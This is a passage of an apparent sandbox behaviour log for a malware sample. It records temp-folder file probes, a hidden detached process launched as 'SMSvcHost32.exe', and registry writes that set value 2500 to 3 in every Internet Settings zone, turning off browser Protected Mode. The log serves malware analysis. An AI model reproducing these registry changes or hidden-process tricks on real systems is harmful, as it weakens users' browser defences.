|
1 | |
| File | Get Info | filename = C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 |
Thread 0xdb4
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz, os_pid = 0xdd4, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xdc0
1276
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
